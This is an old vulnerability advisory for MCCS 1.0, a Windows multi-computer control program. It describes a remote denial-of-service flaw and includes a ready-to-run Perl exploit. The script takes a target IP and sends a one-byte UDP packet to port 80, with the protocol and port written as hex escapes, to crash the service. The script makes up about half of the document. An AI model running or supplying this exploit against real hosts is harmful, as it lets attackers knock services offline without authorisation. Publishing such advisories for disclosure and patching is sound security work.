Update:
20:11 18/09/2005
Subject:
"MCCS Server/Client Command Denial Of Service"
Version:
MCCS 1.0
Operating System:
- All Windows
Typical software:
- Shareware
Severity Flaw:
- low
Description:
MCCS is Multi-Computer Control Systems software that need 2 computer to send command via UDP protocol.
You can start the MCCS client software on client computer at anytime in the process.
You will be able to switch your server Keybord/mouse to the client computer as soon as
the client is added on the server and the client software is started on the Client computer.
Vulnerability:
A denial of service condition has been disclosed in the MCCS application at client server/server it self as component
that could allow a remote attacker to crash the service by sending a malicious UDP packet on specified port.
This could make server application as terminal crashed or need to close.
Exploit:
#!usr/bin/perl
#
# MCCS Server\Client Command DOS Exploit
# --------------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: www.xclusive-software.com
#
use IO::Socket;
print("\n MCCS Command DOS Exploit\n");
print("-----------------------------\n");
$str = "\x41";
if($#ARGV < 0 | $#ARGV > 1) {
die "usage: perl $0 [IP/host] \nExam: perl $0 127.0.0.1 \n" };
$adr = $ARGV[0];
$prt = "\x38\x30";
print "[+] Connect to host..\n";
sleep 2;
$remote = IO::Socket::INET->new(Proto=>"\x75\x64\x70", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "[-] Error: can't connect to $adr:$prt\n";
print "[+] Connected\n";
$remote->autoflush(1);
print "[+] Sending bad string..\n";
sleep 2;
print $remote "$str" or die "[-] Error: can't send string code\n";
print "[*] Client Server SHUTDOWNED!\n\n";
print "press any key to exit..\n";
$bla= STDIN;
close $remote;
Solution:
Upgrade to the latest version where is not vulnerable anymore.
Contact the vendor for more information as regarding this issue.
Vendor URL:
Mail - xclusive-software@keyoscrypt.com
WWW - http://www.xclusive-software.com
Published:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com